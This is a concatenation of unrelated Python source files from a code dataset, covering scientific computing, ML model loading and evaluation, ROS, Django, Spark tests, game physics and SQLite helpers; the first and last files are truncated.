    defaults = config[key] if key in config else []
    return [os, build_type, normalize(what, settings, build_type, defaults)]
def add_tags_if_missing(os, build_type, settings):
    """Guarantee *settings* has a 'tags' list (added in place when absent)
    and repackage the entry as [os, build_type, settings]."""
    settings.setdefault('tags', [])
    return [os, build_type, settings]
def call(f, args):
    """Apply callable *f* to the positional arguments unpacked from *args*."""
    return f(*args)
# Each entry of buildMatrix is an (os, settings) pair where settings carries
# a 'builds' list plus optional extra flags/env keys.
buildMatrix = config['buildMatrix']
# Flatten to [os, build, settings] triples, normalize 'flags' and 'env'
# against the file-level defaults, then guarantee a 'tags' list per entry.
pipeline = make_pipeline( \
    map_step(lambda entry: lift_builds(*entry)),
    reduce_step(lambda x, y: x + y),
    map_step(lambda entry: call(normalize_entry, entry + ['flags'])),
    map_step(lambda entry: call(normalize_entry, entry + ['env'])),
    map_step(lambda entry: add_tags_if_missing(*entry)))
normalizedBuildMatrix = list(pipeline(buildMatrix))
with open(outputFile, 'w') as f:
    json.dump(normalizedBuildMatrix, f, indent=2)
269214 | <filename>floodsystem/analysis.py<gh_stars>0
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
def polyfit(dates, levels, p):
    """Fit a degree-*p* polynomial to water *levels* against *dates*.

    Dates are converted to matplotlib float day numbers and shifted so the
    first date maps to 0, which keeps high-degree fits well conditioned.

    Fix: the function used to return a hard-coded ``time_shift = 1`` even
    though the fit actually subtracts ``date_num[0]``; callers evaluating
    ``poly(date2num(t) - time_shift)`` therefore got wrong values.  It now
    returns the offset that was really applied (the unused ``d0 = 2`` is
    gone too).

    Returns
    -------
    poly : np.poly1d
        Fitted polynomial; evaluate as poly(date2num(t) - d0).
    d0 : float
        Offset subtracted before fitting (first date as a day number).
    """
    date_num = matplotlib.dates.date2num(dates)
    d0 = date_num[0]
    shifted_dates = date_num - d0
    p_coeff = np.polyfit(shifted_dates, levels, p)
    poly = np.poly1d(p_coeff)
    return (poly, d0)
| StarcoderdataPython |
3369082 | <gh_stars>1-10
from rasa_sdk.events import ConversationPaused
from covidflow.actions.action_goodbye import ActionGoodbye
from .action_test_helper import ActionTestCase
class ActionGoodbyeTest(ActionTestCase):
    """Tests for ActionGoodbye: the bot utters a goodbye and pauses the
    conversation."""
    def setUp(self):
        # ActionTestCase.setUp prepares the dispatcher/tracker fixtures.
        super().setUp()
        self.action = ActionGoodbye()
    def test_goodbye(self):
        tracker = self.create_tracker()
        self.run_action(tracker)
        # Running the action must pause the conversation and emit exactly
        # the goodbye template.
        self.assert_events([ConversationPaused()])
        self.assert_templates(["utter_goodbye"])
| StarcoderdataPython |
3395072 | <reponame>robinandeer/puzzle
# -*- coding: utf-8 -*-
from sqlalchemy import (Column, ForeignKey, Integer, String, UniqueConstraint,
Text)
from sqlalchemy.orm import relationship
from .models import BASE
class Suspect(BASE):
    """Represent a list of suspect variants."""
    __tablename__ = "suspect"
    # A given variant may be flagged at most once per case.
    __table_args__ = (UniqueConstraint('case_id', 'variant_id',
                                       name='_case_variant_uc'),)
    id = Column(Integer, primary_key=True)
    # External/composite variant identifier, stored as free text.
    variant_id = Column(Text, nullable=False)
    # Optional human-readable label for the suspect.
    name = Column(String(128))
    case_id = Column(Integer, ForeignKey('case.id'), nullable=False)
    # NOTE(review): backref=('suspects') is a parenthesized string, not a
    # tuple -- it works, but reads oddly.
    case = relationship('Case', backref=('suspects'))
    def __repr__(self):
        return ("Suspect(case_id={this.case_id} variant_id={this.variant_id})"
                .format(this=self))
| StarcoderdataPython |
3261613 | <reponame>MatthewRobertDunn/PyVaders
from entities.entity import Entity
import pymunk
from entities.physics_trait import PhysicsTrait
from entities.takesdamage_trait import TakesDamageTrait
class DestructibleTerrain(PhysicsTrait, TakesDamageTrait):
    """Static terrain whose collision shape is carved away as it takes
    damage: hits multiply a hole image into the texture and the physics
    segments are regenerated from the remaining opaque pixels."""
    def create_physics_body(self, position):
        self.physics_body = pymunk.Body(body_type=pymunk.Body.STATIC) # Create a Body
        self.physics_body.position = position # Set the position of the body
    # Card dimensions in world units.
    BODY_WIDTH = 8.0
    BODY_HEIGHT = 12.0
    def create_graphics_model(self):
        self.draw.create_card(self.BODY_WIDTH,self.BODY_HEIGHT)
        #self.draw.set_texture_from_file("gfx/asteroid.png")
        # Uncached load: each terrain instance mutates its own texture copy.
        self.draw.set_texture_from_file_no_cache("gfx/asteroid.png")
        self.hole_image = self.draw.load_image("gfx/hole_small.png")
        self.physics_components = self.get_segments()
        self.update_graphics_model()
    def take_damage(self, source, amount, self_contact):
        # Convert the world-space contact point into texture coordinates and
        # punch a hole into the texture there.
        self_contact = self.physics_body.world_to_local(self_contact)
        text_coord = self.draw.model_coord_to_texture_coord(self_contact,self.BODY_WIDTH,self.BODY_HEIGHT)
        self.draw.mult_image(self.hole_image, text_coord)
        #Get new physics segments
        new_segments = self.get_segments()
        if len(new_segments) == 0:
            self.context.despawn_entity(self) #no physics segments, kill me.
        else:
            self.context.replace_physics_components(self,new_segments)
    def get_segments(self):
        """Rebuild thin pymunk segments from the texture's current geometry."""
        segments = []
        lines = self.draw.texture_to_geometry(self.BODY_WIDTH,self.BODY_HEIGHT,self.draw.texture)
        for line in lines:
            segment = pymunk.Segment(self.physics_body, line[0], line[1], 0.01)
            segment.collision_type = 1
            segment.entity = self
            segments.append(segment)
        return segments
| StarcoderdataPython |
try:
    # Django 1.6 moved the URL helpers out of defaults.
    from django.conf.urls import patterns, url
except ImportError:
    # Fix: was a bare `except:`, which also swallowed KeyboardInterrupt /
    # SystemExit; only a failed import should trigger the fallback.
    from django.conf.urls.defaults import patterns, url

from semanticeditor.views import *

# URL routes for the semantic editor AJAX endpoints.
urlpatterns = patterns('',
    url(r'retrieve_styles/', retrieve_styles, name="semantic.retrieve_styles"),
    url(r'retrieve_commands/', retrieve_commands, name="semantic.retrieve_commands"),
    url(r'separate_presentation/', separate_presentation, name="semantic.separate_presentation"),
    url(r'combine_presentation/', combine_presentation, name="semantic.combine_presentation"),
    url(r'clean_html/', clean_html_view, name="semantic.clean_html"),
    url(r'preview/', preview, name="semantic.preview"),
)
| StarcoderdataPython |
66781 | from datetime import date
from typing import Dict
from pyspark.sql import SparkSession, Column, DataFrame
# noinspection PyUnresolvedReferences
from pyspark.sql.functions import lit
from pyspark.sql.functions import coalesce, to_date
from spark_auto_mapper.automappers.automapper import AutoMapper
from spark_auto_mapper.helpers.automapper_helpers import AutoMapperHelpers as A
def test_auto_mapper_date_literal(spark_session: SparkSession) -> None:
    """AutoMapper should turn A.date("1970-01-01") into a coalesce over the
    three supported date formats and materialize date(1970, 1, 1) rows."""
    # Arrange
    spark_session.createDataFrame(
        [
            (1, 'Qureshi', 'Imran'),
            (2, 'Vidal', 'Michael'),
        ], ['member_id', 'last_name', 'first_name']
    ).createOrReplaceTempView("patients")
    source_df: DataFrame = spark_session.table("patients")
    df = source_df.select("member_id")
    df.createOrReplaceTempView("members")
    # Act
    mapper = AutoMapper(
        view="members",
        source_view="patients",
        keys=["member_id"],
        drop_key_columns=False
    ).columns(birthDate=A.date("1970-01-01"))
    assert isinstance(mapper, AutoMapper)
    sql_expressions: Dict[str, Column] = mapper.get_column_specs(
        source_df=source_df
    )
    for column_name, sql_expression in sql_expressions.items():
        print(f"{column_name}: {sql_expression}")
    # The generated column spec must try the three date formats in order.
    assert str(sql_expressions["birthDate"]) == str(
        coalesce(
            to_date(lit("1970-01-01"), format='y-M-d'),
            to_date(lit("1970-01-01"), format='yyyyMMdd'),
            to_date(lit("1970-01-01"), format='M/d/y')
        ).alias("birthDate")
    )
    result_df: DataFrame = mapper.transform(df=df)
    # Assert
    result_df.printSchema()
    result_df.show()
    assert result_df.where("member_id == 1").select("birthDate").collect(
    )[0][0] == date(1970, 1, 1)
    assert result_df.where("member_id == 2").select("birthDate").collect(
    )[0][0] == date(1970, 1, 1)
| StarcoderdataPython |
3219517 | <gh_stars>1-10
#!/usr/bin/python
# based on joint_state_publisher by <NAME>!!
import roslib; # roslib.load_manifest('tf_camera_gui')
import rospy
import wx
import tf
from math import pi
from threading import Thread
RANGE = 10000
class TfPublisher():
    """Holds the six TF degrees of freedom (x/y/z, roll/pitch/yaw) as GUI
    'elements' and broadcasts the resulting transform at a fixed rate."""
    def __init__(self):
        # Frames are mandatory ROS private parameters.
        self.parent_frame = rospy.get_param('~parent_frame')
        self.child_frame = rospy.get_param('~child_frame')
        # name -> {'min', 'max', 'zero', 'value'} per degree of freedom.
        self.elements = {}
        self.element_list = [] # for maintaining the original order of the elements
        for name in ['x', 'y', 'z']:
            value = rospy.get_param('~'+name, default=0.0)
            # Translations are limited to +/- 2 m on the sliders.
            element = {'min':-2.0, 'max':2.0, 'zero':value, 'value':value}
            self.elements[name] = element
            self.element_list.append(name)
        for name in ['roll', 'pitch', 'yaw']:
            value = rospy.get_param('~'+name, default=0.0)
            # Rotations span a full +/- pi radians.
            element = {'min':-pi, 'max':pi, 'zero':value, 'value':value}
            self.elements[name] = element
            self.element_list.append(name)
    def loop(self):
        """Broadcast the current transform until ROS shuts down."""
        hz = rospy.get_param("~rate", 10) # 10hz
        r = rospy.Rate(hz)
        # Publish TF messages
        while not rospy.is_shutdown():
            br = tf.TransformBroadcaster()
            br.sendTransform((self.elements['x']['value'], self.elements['y']['value'], self.elements['z']['value']),
                    tf.transformations.quaternion_from_euler(
                        self.elements['roll']['value'],
                        self.elements['pitch']['value'],
                        self.elements['yaw']['value']),
                    rospy.Time.now(),
                    self.child_frame,
                    self.parent_frame)
            r.sleep()
class TfPublisherGui(wx.Frame):
    """wx window with one slider per TF degree of freedom; slider moves are
    written straight into the shared TfPublisher element dicts."""
    def __init__(self, title, tfp):
        wx.Frame.__init__(self, None, -1, title, (-1, -1));
        self.tfp = tfp
        # name -> {'slidervalue', 'display', 'slider', 'element'}
        self.element_map = {}
        panel = wx.Panel(self, wx.ID_ANY);
        box = wx.BoxSizer(wx.VERTICAL)
        font = wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD)
        ### Sliders ###
        for name in self.tfp.element_list:
            element = self.tfp.elements[name]
            # A zero-width range cannot be mapped onto a slider; skip it.
            if element['min'] == element['max']:
                continue
            row = wx.GridSizer(1,2)
            label = wx.StaticText(panel, -1, name)
            label.SetFont(font)
            row.Add(label, 1, wx.ALIGN_CENTER_VERTICAL)
            display = wx.TextCtrl (panel, value=str(0),
                        style=wx.TE_READONLY | wx.ALIGN_RIGHT)
            row.Add(display, flag= wx.ALIGN_RIGHT| wx.ALIGN_CENTER_VERTICAL)
            box.Add(row, 1, wx.EXPAND)
            slider = wx.Slider(panel, -1, RANGE/2, 0, RANGE,
                        style= wx.SL_AUTOTICKS | wx.SL_HORIZONTAL)
            slider.SetFont(font)
            box.Add(slider, 1, wx.EXPAND)
            self.element_map[name] = {'slidervalue':0, 'display':display,
                                    'slider':slider, 'element':element}
        ### Buttons ###
        self.ctrbutton = wx.Button(panel, 1, 'Center')
        self.Bind(wx.EVT_SLIDER, self.sliderUpdate)
        wx.EVT_BUTTON(self, 1, self.center_event)
        box.Add(self.ctrbutton, 0, wx.EXPAND)
        panel.SetSizer(box)
        self.center()
        box.Fit(self)
        self.update_values()
    def update_values(self):
        """Push the cached slider positions into widgets and element values."""
        for (name,element_info) in self.element_map.items():
            purevalue = element_info['slidervalue']
            element = element_info['element']
            value = self.sliderToValue(purevalue, element)
            element['value'] = value
            element_info['slider'].SetValue(purevalue)
            element_info['display'].SetValue("%.2f"%value)
    def center_event(self, event):
        self.center()
    def center(self):
        """Reset every slider to its element's 'zero' (startup) value."""
        rospy.loginfo("Centering")
        for (name,element_info) in self.element_map.items():
            element = element_info['element']
            element_info['slidervalue'] = self.valueToSlider(element['zero'], element)
        self.update_values()
    def sliderUpdate(self, event):
        # Any slider moved: re-read all positions and refresh the displays.
        for (name,element_info) in self.element_map.items():
            element_info['slidervalue'] = element_info['slider'].GetValue()
        self.update_values()
    def valueToSlider(self, value, element):
        # Map a physical value onto the integer [0, RANGE] slider scale.
        return (value - element['min']) * float(RANGE) / (element['max'] - element['min'])
    def sliderToValue(self, slider, element):
        # Inverse of valueToSlider.
        pctvalue = slider / float(RANGE)
        return element['min'] + (element['max']-element['min']) * pctvalue
if __name__ == '__main__':
    try:
        rospy.init_node('tf_publisher_gui')
        tfp = TfPublisher()
        app = wx.App()
        gui = TfPublisherGui("TF Publisher", tfp)
        gui.Show()
        # Run the wx event loop on a worker thread so the blocking ROS
        # publishing loop below can own the main thread.
        Thread(target=app.MainLoop).start()
        tfp.loop()
    except rospy.ROSInterruptException: pass
| StarcoderdataPython |
9682633 | import os
import yaml
import tarfile
import urllib.request
from urllib.parse import urlparse
from pathlib import Path
from tqdm import tqdm
from transformers import Wav2Vec2ForCTC, Wav2Vec2Processor
from ctcdecode import CTCBeamDecoder
class DownloadProgressBar(tqdm):
    """tqdm subclass whose update_to() matches urlretrieve's reporthook
    signature (block count, block size, total size)."""
    def update_to(self, b=1, bsize=1, tsize=None):
        # tsize may be None until the server reports Content-Length.
        if tsize is not None:
            self.total = tsize
        # Advance by the delta since the last call (self.n is tqdm's count).
        self.update(b * bsize - self.n)
def create(model_path, revision):
    """Load a Wav2Vec2 CTC model plus two beam-search decoders (with and
    without a KenLM language model), downloading the KenLM archive from the
    Hugging Face Hub when it is not cached yet.

    Returns (processor, model, vocab, ctcdecoder, kenlm_ctcdecoder).
    """
    cache_dir=model_path
    if Path(model_path).is_dir():
        # Local checkout: load directly from the directory.
        processor = Wav2Vec2Processor.from_pretrained(model_path)
        model = Wav2Vec2ForCTC.from_pretrained(model_path)
    else:
        # Hub model id: cache it under /models/published/<model_path>.
        cache_dir = os.path.join('/', 'models', 'published', model_path)
        processor = Wav2Vec2Processor.from_pretrained(model_path, cache_dir=cache_dir, revision=revision)
        model = Wav2Vec2ForCTC.from_pretrained(model_path, cache_dir=cache_dir, revision=revision)
    targz_file_path=os.path.join(cache_dir, "kenlm.tar.gz")
    if not Path(targz_file_path).is_file():
        print ("Downloading kenlm language model version {}".format(revision))
        # NOTE(review): os.path.join on a URL only yields '/'-separated
        # paths on POSIX; breaks on Windows.
        file_url = os.path.join("https://huggingface.co", model_path, "resolve", revision, 'kenlm.tar.gz')
        download(file_url, os.path.join(cache_dir, targz_file_path))
    if not Path(os.path.join(cache_dir, "config_ctc.yaml")).is_file():
        extract(targz_file_path)
    # alpha/beta decoding weights tuned for this KenLM model.
    with open(os.path.join(cache_dir, "config_ctc.yaml"), 'r') as config_file:
        ctc_lm_params=yaml.load(config_file, Loader=yaml.FullLoader)
    # Decoder vocabulary: tokenizer tokens with '|' mapped back to a space.
    vocab=processor.tokenizer.convert_ids_to_tokens(range(0, processor.tokenizer.vocab_size))
    space_ix = vocab.index('|')
    vocab[space_ix]=' '
    # Plain beam-search decoder (no language model).
    ctcdecoder = CTCBeamDecoder(vocab,
                    model_path='',
                    alpha=0,
                    beta=0,
                    cutoff_top_n=40,
                    cutoff_prob=1.0,
                    beam_width=100,
                    num_processes=4,
                    blank_id=processor.tokenizer.pad_token_id,
                    log_probs_input=True
                    )
    # Beam-search decoder rescored with the KenLM binary language model.
    kenlm_ctcdecoder = CTCBeamDecoder(vocab,
                    model_path=os.path.join(cache_dir, "lm.binary"),
                    alpha=ctc_lm_params['alpha'],
                    beta=ctc_lm_params['beta'],
                    cutoff_top_n=40,
                    cutoff_prob=1.0,
                    beam_width=100,
                    num_processes=4,
                    blank_id=processor.tokenizer.pad_token_id,
                    log_probs_input=True
                    )
    return processor, model, vocab, ctcdecoder, kenlm_ctcdecoder
def download(file_url, output_file_path):
    """Download *file_url* to *output_file_path*, showing a tqdm progress bar
    named after the last URL component."""
    with DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=file_url.split('/')[-1]) as t:
        urllib.request.urlretrieve(file_url, filename=output_file_path, reporthook=t.update_to)
def extract(targz_file_path):
    """Unpack a .tar.gz archive into its own directory; silently does
    nothing for any other suffix."""
    # extract.
    if targz_file_path.endswith(".tar.gz"):
        print ("Extracting...")
        model_dir = Path(targz_file_path).parent.absolute()
        tar = tarfile.open(targz_file_path, "r:gz")
        # NOTE(review): extractall trusts member paths; a malicious tarball
        # could write outside model_dir (path traversal). Consider validating
        # members or using tarfile's extraction-filter API.
        tar.extractall(model_dir)
        tar.close()
        #Path(output_file_path).unlink()
| StarcoderdataPython |
8043381 | <filename>tests/extmath_test.py
# encoding: utf-8
from __future__ import division, print_function
import numpy as np
import pytest as pt
from mpnum import _testing as mptest
from mpnum import factory, utils
from mpnum.utils import extmath as em
from numpy.testing import (assert_allclose, assert_array_almost_equal,
assert_array_equal)
from scipy.linalg import block_diag
from six.moves import range
def test_block_diag_simple(rgen):
    """utils.block_diag on plain 2D matrices must match scipy's block_diag."""
    rows = (4, 7)
    cols = (3, 6)
    summands = [factory._zrandn((rows[i], cols[i]), randstate=rgen)
                for i in range(len(rows))]
    blockdiag_sum = utils.block_diag(summands)
    blockdiag_sum_scipy = block_diag(*summands)
    assert_array_almost_equal(blockdiag_sum, blockdiag_sum_scipy)
def test_block_diag(rgen):
    """utils.block_diag with axes=(1, 2) must block-diagonalize only the two
    middle axes of rank-4 arrays; checked against an explicit construction
    built with scipy's 2D block_diag."""
    leftmargin = 3
    rightmargin = 5
    rows = (4, 7)
    cols = (3, 6)
    nr_blocks = len(rows)
    nr_summands = 3
    leftvecs = factory._zrandn((nr_blocks, nr_summands, leftmargin),
                               randstate=rgen)
    middlematrices = [factory._zrandn((nr_summands, rows[i], cols[i]),
                                      randstate=rgen)
                      for i in range(nr_blocks)]
    rightvecs = factory._zrandn((nr_blocks, nr_summands, rightmargin),
                                randstate=rgen)
    # Each summand is a sum of outer products left (x) middle (x) right.
    blockdiag_summands = []
    for i in range(nr_blocks):
        summand = np.zeros(
            (leftmargin, rows[i], cols[i], rightmargin), dtype=complex)
        for j in range(nr_summands):
            summand += np.outer(
                np.outer(leftvecs[i, j, :], middlematrices[i][j, :, :]),
                rightvecs[i, j, :]).reshape(summand.shape)
        blockdiag_summands.append(summand)
    blockdiag_sum = utils.block_diag(blockdiag_summands, axes=(1, 2))
    # Explicit reference: embed each middle matrix into a zero-padded 2D
    # block-diagonal and take the same outer products.
    blockdiag_sum_explicit = np.zeros(
        (leftmargin, sum(rows), sum(cols), rightmargin), dtype=complex)
    for i in range(nr_blocks):
        for j in range(nr_summands):
            summands = [middlematrices[i2][j]
                        if i2 == i else np.zeros_like(middlematrices[i2][j])
                        for i2 in range(nr_blocks)]
            middle = block_diag(*summands)
            blockdiag_sum_explicit += \
                np.outer(np.outer(leftvecs[i][j], middle), rightvecs[i][j]) \
                .reshape(blockdiag_sum_explicit.shape)
    assert_array_almost_equal(blockdiag_sum, blockdiag_sum_explicit)
TESTARGS_MATRIXDIMS = [(50, 50), (100, 50), (50, 75)]
TESTARGS_RANKS = [1, 10, 'fullrank']
@pt.mark.parametrize('rows, cols', TESTARGS_MATRIXDIMS)
@pt.mark.parametrize('rank', TESTARGS_RANKS)
@pt.mark.parametrize('dtype', pt.MP_TEST_DTYPES)
@pt.mark.parametrize('piter_normalizer', [None, 'qr', 'lu', 'auto'])
def test_approximate_range_finder(rows, cols, rank, dtype, piter_normalizer, rgen):
    """approx_range_finder must capture the range of a low-rank matrix:
    projecting A onto span(Q) should reproduce A almost exactly."""
    # only guaranteed to work for low-rank matrices
    # Fix: was `rank is 'fullrank'` -- identity comparison with a string
    # literal only works by CPython interning and is a SyntaxWarning on
    # modern Python; use equality.
    if rank == 'fullrank':
        return
    rf_size = rank + 10
    assert min(rows, cols) > rf_size
    A = mptest.random_lowrank(rows, cols, rank, randstate=rgen, dtype=dtype)
    A /= np.linalg.norm(A, ord='fro')
    Q = em.approx_range_finder(A, rf_size, 7, randstate=rgen,
                               piter_normalizer=piter_normalizer)
    # NOTE(review): np.asmatrix is deprecated in NumPy; kept for behavior.
    Q = np.asmatrix(Q)
    assert Q.shape == (rows, rf_size)
    normdist = np.linalg.norm(A - Q * (Q.H * A), ord='fro')
    assert normdist < 1e-7
@pt.mark.parametrize('rows, cols', TESTARGS_MATRIXDIMS)
@pt.mark.parametrize('rank', TESTARGS_RANKS)
@pt.mark.parametrize('dtype', pt.MP_TEST_DTYPES)
@pt.mark.parametrize('transpose', [False, True, 'auto'])
@pt.mark.parametrize('n_iter, target_gen', [(7, mptest.random_lowrank),
                                            (20, mptest.random_fullrank)])
def test_randomized_svd(rows, cols, rank, dtype, transpose, n_iter, target_gen,
                        rgen):
    """randomized_svd must agree with a truncated dense SVD up to phases,
    and return singular values in descending order."""
    # Fix: was `rank is 'fullrank'` (identity check on a string literal,
    # interning-dependent and a SyntaxWarning on modern Python).
    rank = min(rows, cols) - 2 if rank == 'fullrank' else rank
    A = target_gen(rows, cols, rank=rank, randstate=rgen, dtype=dtype)
    U_ref, s_ref, V_ref = utils.truncated_svd(A, k=rank)
    U, s, V = em.randomized_svd(A, rank, transpose=transpose, randstate=rgen,
                                n_iter=n_iter)
    # Singular vectors may differ by a phase: compare |U^H U_ref| to identity.
    error_U = np.abs(U.conj().T.dot(U_ref)) - np.eye(rank)
    assert_allclose(np.linalg.norm(error_U), 0, atol=1e-3)
    error_V = np.abs(V.dot(V_ref.conj().T)) - np.eye(rank)
    assert_allclose(np.linalg.norm(error_V), 0, atol=1e-3)
    assert_allclose(s.ravel() - s_ref, 0, atol=1e-3)
    # Check that singular values are returned in descending order
    assert_array_equal(s, np.sort(s)[::-1])
| StarcoderdataPython |
3312353 | import tensorflow as tf
import configuration
import numpy as np
from LSTM_model import LSTM_model
def main():
    # Despite the name of train() below, this entry point only scores the
    # model on the "input_seqs_eval" dataset.
    config = configuration.ModelConfig(data_filename="input_seqs_eval")
    train(config)
def train(config):
    """Evaluate a saved LSTM checkpoint on the configured dataset and print
    its accuracy.  (Misnamed: no weights are updated here -- the checkpoint
    at ./save/LSTM/save-60000 is restored and only scored.)"""
    with tf.Graph().as_default():
        model = LSTM_model(config)
        # One pass over the data in original order.
        inputs_seqs_batch, outputs_batch = model.reader.read(shuffle=False, num_epochs=1)
        init_op = tf.group(tf.initialize_all_variables(),
                           tf.initialize_local_variables())
        sess = tf.Session()
        sess.run(init_op)
        saver = tf.train.Saver(tf.all_variables())
        global_steps = 0
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(sess=sess, coord=coord)
        saver.restore(sess, "./save/LSTM/save-60000")
        correct_count = 0
        evaled_count = 0
        try:
            while not coord.should_stop():
                input_data, targets = sess.run([inputs_seqs_batch, outputs_batch])
                probs = sess.run([model.probs], {model.input_data: input_data,
                                                 model.targets: targets})
                probs = np.array(probs).reshape([-1, config.vocab_size])
                targets = np.array([t[0] for t in targets])
                # Predicted class = argmax over the vocabulary distribution.
                output = np.argmax(probs, axis=1)
                correct_count += np.sum(output == targets)
                evaled_count += len(output)
        except tf.errors.OutOfRangeError:
            # num_epochs=1 exhausted: normal end of the evaluation pass.
            pass
        finally:
            # When done, ask the threads to stop.
            coord.request_stop()
        # NOTE(review): divides by evaled_count -- ZeroDivisionError if the
        # input queue produced no batches.
        print("Accuracy: %f" % (float(correct_count) / evaled_count))
        coord.join(threads)
        sess.close()
if __name__ == "__main__":
main()
| StarcoderdataPython |
6463840 | # 2.
# Используя расщепление матрицы Стилтьеса, отвечающее её неполной факторизации по методу ILU(k),
# реализовать стационарный итерационный процесс и исследовать скорость его сходимости
#
# стр. 65 - Основные стационарные итерационные процессы
# стр. 75 - ускорение сходимости стационарных итерационных процессов
#
# http://mathworld.wolfram.com/StationaryIterativeMethod.html
# Stationary iterative methods are methods for solving a linear system of equations Ax=b
#
import numpy as np
ITERATION_LIMIT = 1000
# initialize the matrix
A = np.array([[10., -1., 2., 0.],
[-1., 11., -1., 3.],
[2., -1., 10., -1.],
[0., 3., -1., 8.]])
# initialize the RHS vector
b = np.array([6., 25., -11., 15.])
def jacobi_method(A: np.ndarray, b: np.ndarray, max_iter: int = 1000):
    """Solve A x = b with the Jacobi stationary iteration.

    Every new component is computed from the previous iterate only, so the
    sweep order is irrelevant.  Converges e.g. for strictly diagonally
    dominant A.

    :param A: (n, n) coefficient matrix with nonzero diagonal
    :param b: (n,) right-hand side
    :param max_iter: iteration cap (default matches the old ITERATION_LIMIT)
    :return: final iterate; stops early once successive iterates agree to
             atol=1e-8
    """
    x = np.zeros_like(b)
    for _ in range(max_iter):
        x_new = np.zeros_like(x)
        for i in range(A.shape[0]):
            s1 = np.dot(A[i, :i], x[:i])          # strictly-lower part, old x
            s2 = np.dot(A[i, i + 1:], x[i + 1:])  # strictly-upper part, old x
            x_new[i] = (b[i] - s1 - s2) / A[i, i]
        if np.allclose(x, x_new, atol=1e-8):
            break
        x = x_new
    return x
def gauss_seidel(A: np.ndarray, b: np.ndarray, max_iter: int = 1000):
    """Solve A x = b with the Gauss-Seidel stationary iteration.

    Unlike Jacobi, each sweep immediately reuses the components already
    updated in the current iteration (x_new[:i]), which typically roughly
    halves the iteration count.

    :param A: (n, n) coefficient matrix with nonzero diagonal
    :param b: (n,) right-hand side
    :param max_iter: iteration cap (default matches the old ITERATION_LIMIT)
    :return: final iterate; stops early once successive iterates agree to
             rtol=1e-8
    """
    x = np.zeros_like(b)
    for _ in range(max_iter):
        x_new = np.zeros_like(x)
        for i in range(A.shape[0]):
            s1 = np.dot(A[i, :i], x_new[:i])      # already-updated components
            s2 = np.dot(A[i, i + 1:], x[i + 1:])  # not-yet-updated components
            x_new[i] = (b[i] - s1 - s2) / A[i, i]
        if np.allclose(x, x_new, rtol=1e-8):
            break
        x = x_new
    return x
def sor_method(A: np.ndarray, b: np.ndarray, w=1.0, max_iter: int = 1000):
    """Solve A x = b by successive over-relaxation (SOR).

    :param A: (n, n) coefficient matrix with nonzero diagonal
    :param b: (n,) right-hand side
    :param w: relaxation factor; 0 < w < 2 for SPD matrices, w == 1.0
              reduces to Gauss-Seidel
    :param max_iter: iteration cap (default matches the old ITERATION_LIMIT)
    :return: final iterate; stops early once successive iterates agree to
             rtol=1e-8
    """
    x = np.zeros_like(b)
    for _ in range(max_iter):
        x_new = np.zeros_like(x)
        for i in range(A.shape[0]):
            s1 = np.dot(A[i, :i], x_new[:i])
            s2 = np.dot(A[i, i + 1:], x[i + 1:])
            # Blend the Gauss-Seidel update with the previous value.
            x_new[i] = (1.0 - w) * x[i] + w * (b[i] - s1 - s2) / A[i, i]
        if np.allclose(x, x_new, rtol=1e-8):
            break
        x = x_new
    return x
def ssor_method(A: np.ndarray, b: np.ndarray, w=1.0, max_iter: int = 1000):
    """Solve A x = b by symmetric SOR: a forward SOR sweep followed by a
    backward SOR sweep per iteration.

    Fix: the original indexed its iterate table with the float ``k/2``
    (a TypeError under Python 3) and mixed up which iterate each sweep
    should read; this version keeps the two half-iterates explicitly.

    :param A: (n, n) coefficient matrix with nonzero diagonal
    :param b: (n,) right-hand side
    :param w: relaxation factor, 0 < w < 2 for SPD matrices
    :param max_iter: iteration cap (default matches the old ITERATION_LIMIT)
    :return: final iterate; stops once successive iterates agree to rtol=1e-8
    """
    x = np.zeros_like(b)
    n = A.shape[0]
    for _ in range(max_iter):
        # Forward SOR sweep: x -> x_half (uses updated entries x_half[:i]).
        x_half = x.copy()
        for i in range(n):
            s1 = np.dot(A[i, :i], x_half[:i])
            s2 = np.dot(A[i, i + 1:], x[i + 1:])
            x_half[i] = (1.0 - w) * x[i] + w * (b[i] - s1 - s2) / A[i, i]
        # Backward SOR sweep: x_half -> x_new (uses updated entries x_new[i+1:]).
        x_new = x_half.copy()
        for i in reversed(range(n)):
            s1 = np.dot(A[i, :i], x_half[:i])
            s2 = np.dot(A[i, i + 1:], x_new[i + 1:])
            x_new[i] = (1.0 - w) * x_half[i] + w * (b[i] - s1 - s2) / A[i, i]
        if np.allclose(x, x_new, rtol=1e-8):
            x = x_new
            break
        x = x_new
    return x
x = sor_method(A, b)
print("Final solution:")
print(x)
error = np.dot(A, x) - b
print("Error:")
print(error) | StarcoderdataPython |
3453135 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sqlite3
import json
def connect(db = "tr5nr.sqlite"):
    """ Open a connection to the SQLite database file.
    :param db: database file
    :return: connection object, or None when opening fails
    """
    try:
        return sqlite3.connect(db)
    except sqlite3.Error as err:
        # Same best-effort behaviour as before: report and return None.
        print(err)
        return None
def query(conn, sql = ""):
    """ Run *sql* on *conn* and fetch every resulting row.
    :param conn: sqlite connection object
    :param sql: sql query
    :return: list of result rows
    """
    cur = conn.cursor()
    cur.execute(sql)
    return cur.fetchall()
def get_stations(conn):
    """ Return every station as a dict with English keys.
    :param conn: sqlite connection object
    :return: list of {code, name, section, time, type} dicts
    """
    sql = """
    SELECT codigo, nombre, tramo, tiempo, tipo from estacion ORDER BY codigo ASC
    """
    return [
        {"code": code, "name": name, "section": section,
         "time": time, "type": kind}
        for code, name, section, time, kind in query(conn, sql)
    ]
def get_users(conn):
    """ Return every user type as {code, name, category}.
    Codes 1-4 map to special fare categories; anything else is 'general'.
    """
    sql = """
    SELECT codigo, tipo FROM usuario ORDER BY codigo ASC
    """
    categories = {1: "student", 2: "senior", 3: "handicapped", 4: "special"}
    return [
        {"code": code, "name": name,
         "category": categories.get(code, "general")}
        for code, name in query(conn, sql)
    ]
def get_schedules(conn):
    """ Return every timetable entry as {origin, destination, day, time}. """
    sql = """
    SELECT origen, direccion, dia, hora FROM horario ORDER BY origen ASC
    """
    return [
        {"origin": origin, "destination": destination,
         "day": day, "time": time}
        for origin, destination, day, time in query(conn, sql)
    ]
def get_ranges(conn):
    """Fetch the fare ranges, ordered by code, tagging each with a category."""
    sql = """
    SELECT codigo, tipo, desde, hasta FROM rango ORDER BY codigo ASC
    """
    rows = query(conn, sql)
